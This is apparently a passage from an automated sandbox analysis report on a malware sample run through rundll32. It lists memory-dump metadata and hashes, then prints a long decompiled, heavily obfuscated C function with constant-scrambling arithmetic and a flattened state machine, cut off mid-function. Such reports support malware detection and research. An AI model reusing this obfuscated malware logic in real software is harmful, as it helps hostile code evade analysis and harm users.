                                                                                                                                    0x002d5817
                                                                                                                                    0x002d581f
                                                                                                                                    0x002d5717
                                                                                                                                    0x002d5717
                                                                                                                                    0x00000000
                                                                                                                                    0x002d5717
                                                                                                                                    0x002d575e
                                                                                                                                    0x002d575e
                                                                                                                                    0x002d5760
                                                                                                                                    0x00000000
                                                                                                                                    0x002d5766
                                                                                                                                    0x002d5766
                                                                                                                                    0x002d576f
                                                                                                                                    0x002d577a
                                                                                                                                    0x002d5780
                                                                                                                                    0x002d57ba
                                                                                                                                    0x002d57bf
                                                                                                                                    0x002d57d2
                                                                                                                                    0x002d57d7
                                                                                                                                    0x002d57d8
                                                                                                                                    0x002d5717
                                                                                                                                    0x002d5717
                                                                                                                                    0x00000000
                                                                                                                                    0x002d5717
                                                                                                                                    0x002d5717
                                                                                                                                    0x002d5760
                                                                                                                                    0x002d5758
                                                                                                                                    0x002d574c
                                                                                                                                    0x00000000
                                                                                                                                    0x002d5afa
                                                                                                                                    0x002d5afa
                                                                                                                                    0x002d5afa
                                                                                                                                    0x00000000
                                                                                                                                    0x002d571c

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                                    • API String ID: 1514166925-4215140744
                                                                                                                                    • Opcode ID: 5ca4c333d0c715a65a4720bfe0fcf135a5ddd7e31a7b623955e21d2550163429
                                                                                                                                    • Instruction ID: 0276cdd2dde0829a13edbfd31bed0709bbe5db8035b044b4be2ff435049d3c6b
                                                                                                                                    • Opcode Fuzzy Hash: 5ca4c333d0c715a65a4720bfe0fcf135a5ddd7e31a7b623955e21d2550163429
                                                                                                                                    • Instruction Fuzzy Hash: D872F0714093819FD3B8CF25C58AB9BBBE1BBC4318F108A1DE1DA96260D7B48959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D2550 Relevance: 21.1, Strings: 16, Instructions: 1077COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E002D2550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
				_v452 = _v452 | 0xbb60e7c3;
				_v452 = _v452 ^ 0x0d3b8c6d;
				_v452 = _v452 ^ 0xb65710e5;
				_v636 = 0x61f3a7;
				_v636 = _v636 + 0xffff300f;
				_v636 = _v636 << 1;
				_v636 = _v636 * 0x27;
				_v636 = _v636 ^ 0x1d9bc7e7;
				_v224 = 0x725254;
				_v224 = _v224 + 0xfffffac1;
				_v224 = _v224 ^ 0x007e9bc6;
				_v228 = 0xd6200c;
				_v228 = _v228 ^ 0x5ef32346;
				_v228 = _v228 ^ 0x5e2a0e2d;
				_v540 = 0xc12668;
				_v540 = _v540 << 8;
				_v540 = _v540 * 0x51;
				_v540 = _v540 + 0xffff6981;
				_v540 = _v540 ^ 0x1d2c502d;
				_v496 = 0x68726f;
				_v496 = _v496 + 0xb8c4;
				_v496 = _v496 + 0xffff3269;
				_v496 = _v496 << 1;
				_v496 = _v496 ^ 0x00d37668;
				_v296 = 0x65f16b;
				_v296 = _v296 ^ 0xac840f83;
				_v296 = _v296 ^ 0xace8f4ad;
				_v336 = 0xf34185;
				_v336 = _v336 + 0xffff7084;
				_v336 = _v336 ^ 0x22f89925;
				_v336 = _v336 ^ 0x2207d32f;
				_v400 = 0x9220b0;
				_v400 = _v400 | 0xa2c46701;
				_v400 = _v400 + 0x1a14;
				_v400 = _v400 ^ 0xa2d5ce26;
				_v368 = 0x18190f;
				_v368 = _v368 * 0x6c;
				_t1203 = 0x47;
				_v368 = _v368 * 0x49;
				_v368 = _v368 ^ 0xe62bbbec;
				_v276 = 0x664929;
				_v276 = _v276 + 0xffffab3c;
				_v276 = _v276 ^ 0x0066f8be;
				_v420 = 0x55fac4;
				_v420 = _v420 / _t1203;
				_v420 = _v420 | 0x23698c02;
				_v420 = _v420 ^ 0x23676b12;
				_v428 = 0x2d8f3d;
				_v428 = _v428 ^ 0xcbbc8554;
				_v428 = _v428 + 0xffff5f5b;
				_v428 = _v428 ^ 0xcb969d3b;
				_v408 = 0x7d0ed3;
				_t1204 = 0x33;
				_v408 = _v408 / _t1204;
				_v408 = _v408 ^ 0x03ccba73;
				_v408 = _v408 ^ 0x03c41a74;
				_v212 = 0xf1bcf;
				_v212 = _v212 | 0xafbe7d4b;
				_v212 = _v212 ^ 0xafbe5483;
				_v476 = 0x76a0ac;
				_v476 = _v476 << 0xa;
				_v476 = _v476 << 2;
				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E002D66CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E002D1FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E002E0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E002D95FA();
									_t1122 = E002D1FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E002DC110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E002C59F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
							}
							__eflags = _t1317 - 0x3fc5519;
							if(_t1317 == 0x3fc5519) {
								_v144 = E002D20B0();
								_t1125 = E002D1DDD(_v452, _t1152, _v636, _v224);
								_pop(_t1237);
								_v140 = _t1125;
								_t1317 = 0xa74297b;
								continue;
							}
							__eflags = _t1317 - 0x42dc4f0;
							if(_t1317 == 0x42dc4f0) {
								_t1125 = _v468;
								_t1317 = 0x4cdd8ae;
								_v112 = _t1125;
								continue;
							}
							__eflags = _t1317 - 0x4a24b69;
							if(_t1317 == 0x4a24b69) {
								_t1125 = E002D0326();
								_t1317 = 0x8690ed6;
								continue;
							}
							__eflags = _t1317 - 0x4cdd8ae;
							if(_t1317 != 0x4cdd8ae) {
								goto L109;
							}
							_t1125 = _v508;
							_t1317 = 0x5dcd6da;
							_v124 = _t1125;
							continue;
						}
						if(_t1349 == 0) {
							E002D8519(_v244, _v352, _v188);
							L34:
							_t1317 = 0xe4333b3;
							continue;
						}
						_t1350 = _t1317 - 0x27d9d92;
						if(_t1350 > 0) {
							__eflags = _t1317 - 0x2a998d8;
							if(_t1317 == 0x2a998d8) {
								_t1124 = E002C1A56( &_v180,  &_v84, _v572, _v516);
								__eflags = _t1124;
								if(_t1124 != 0) {
									_t1125 = _v28;
									__eflags = _t1125 - 8;
									if(_t1125 != 8) {
										__eflags = _t1125;
										if(_t1125 == 0) {
											L32:
											_t1317 = 0xa65551a;
											continue;
										}
										__eflags = _t1125 - 1;
										if(_t1125 != 1) {
											goto L27;
										}
										goto L32;
									}
									_t1317 = 0xc1a4fe5;
									continue;
								}
								_t1125 = E002D0AE0(_v308, _v564);
								_pop(_t1237);
								_t1314 = _t1125;
								_t1191 = 0x5dcd6da;
								goto L27;
							}
							__eflags = _t1317 - 0x2cf0ed0;
							if(_t1317 == 0x2cf0ed0) {
								_t1125 = E002DCB5B(_v340, _v248, _v348, _v356);
								goto L114;
							}
							__eflags = _t1317 - 0x3250d84;
							if(__eflags == 0) {
								_v196 = E002D7BA6( &_v192, _v596, __eflags, _v492, 0x2c1444);
								_v204 = E002D7BA6( &_v200, _v316, __eflags, _v344, 0x2c14b4);
								_t1130 = E002C5361(_v460, _v524,  &_v196,  &_v204);
								_t1345 = _t1345 + 0x1c;
								asm("sbb esi, esi");
								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
								E002CA8B0(_v376, _v204, _v424);
								_t1125 = E002CA8B0(_v580, _v196, _v328);
								goto L109;
							}
							__eflags = _t1317 - 0x3ace1b1;
							if(_t1317 != 0x3ace1b1) {
								goto L109;
							}
							_t1125 = E002D473C();
							_t1317 = 0xc245297;
							continue;
						}
						if(_t1350 == 0) {
							_t1141 = E002D4116();
							__eflags = _t1141;
							if(_t1141 == 0) {
								_t1125 = E002D1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
							} else {
								_t1125 = E002D1FFB();
								asm("sbb esi, esi");
								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
							}
							continue;
						}
						if(_t1317 == 0xc4dcd) {
							_t1125 = E002D8519(_v440, _v612, _v180);
							_t1317 = 0x3d71c3c;
							continue;
						}
						if(_t1317 == 0x283259) {
							_t1125 = E002C64E2(_v476, _v332, _v252,  &_v188, E002C4E74(), _v232, _v620,  &_v180);
							_t1345 = _t1345 + 0x18;
							asm("sbb esi, esi");
							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
							continue;
						}
						if(_t1317 == 0x1b53ec1) {
							_t1125 = E002D87D1();
							_v104 = _t1125;
							_t1317 = 0xfa2c753;
							continue;
						}
						if(_t1317 != 0x1f27ca8) {
							goto L109;
						}
						_t1125 = E002D20BA();
						if(_t1125 == 0) {
							goto L114;
						} else {
							_t1317 = 0xa7d0a44;
							continue;
						}
					}
					__eflags = _t1317 - 0xa7d0a44;
					if(__eflags > 0) {
						__eflags = _t1317 - 0xd7f216f;
						if(__eflags > 0) {
							__eflags = _t1317 - 0xdbd69f4;
							if(_t1317 == 0xdbd69f4) {
								_t1114 = E002D9BCF();
								__eflags = _t1114;
								if(_t1114 != 0) {
									L85:
									_t1317 = 0x2cf0ed0;
									goto L1;
								}
								_t1317 = 0xc7d9b3b;
								goto L109;
							}
							__eflags = _t1317 - 0xe4333b3;
							if(_t1317 == 0xe4333b3) {
								__eflags = _t1314 - _v288;
								if(_t1314 == _v288) {
									L106:
									_t1317 = _t1191;
									goto L109;
								}
								_t1134 = E002C4E74();
								_t1237 = _v480;
								_t1125 = E002C8DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
								_t1345 = _t1345 + 0x10;
								__eflags = _t1125 - _v372;
								if(_t1125 == _v372) {
									_t1125 = E002C6D24();
									goto L106;
								}
								_t1317 = 0x942db73;
								goto L1;
							}
							__eflags = _t1317 - 0xfa2c753;
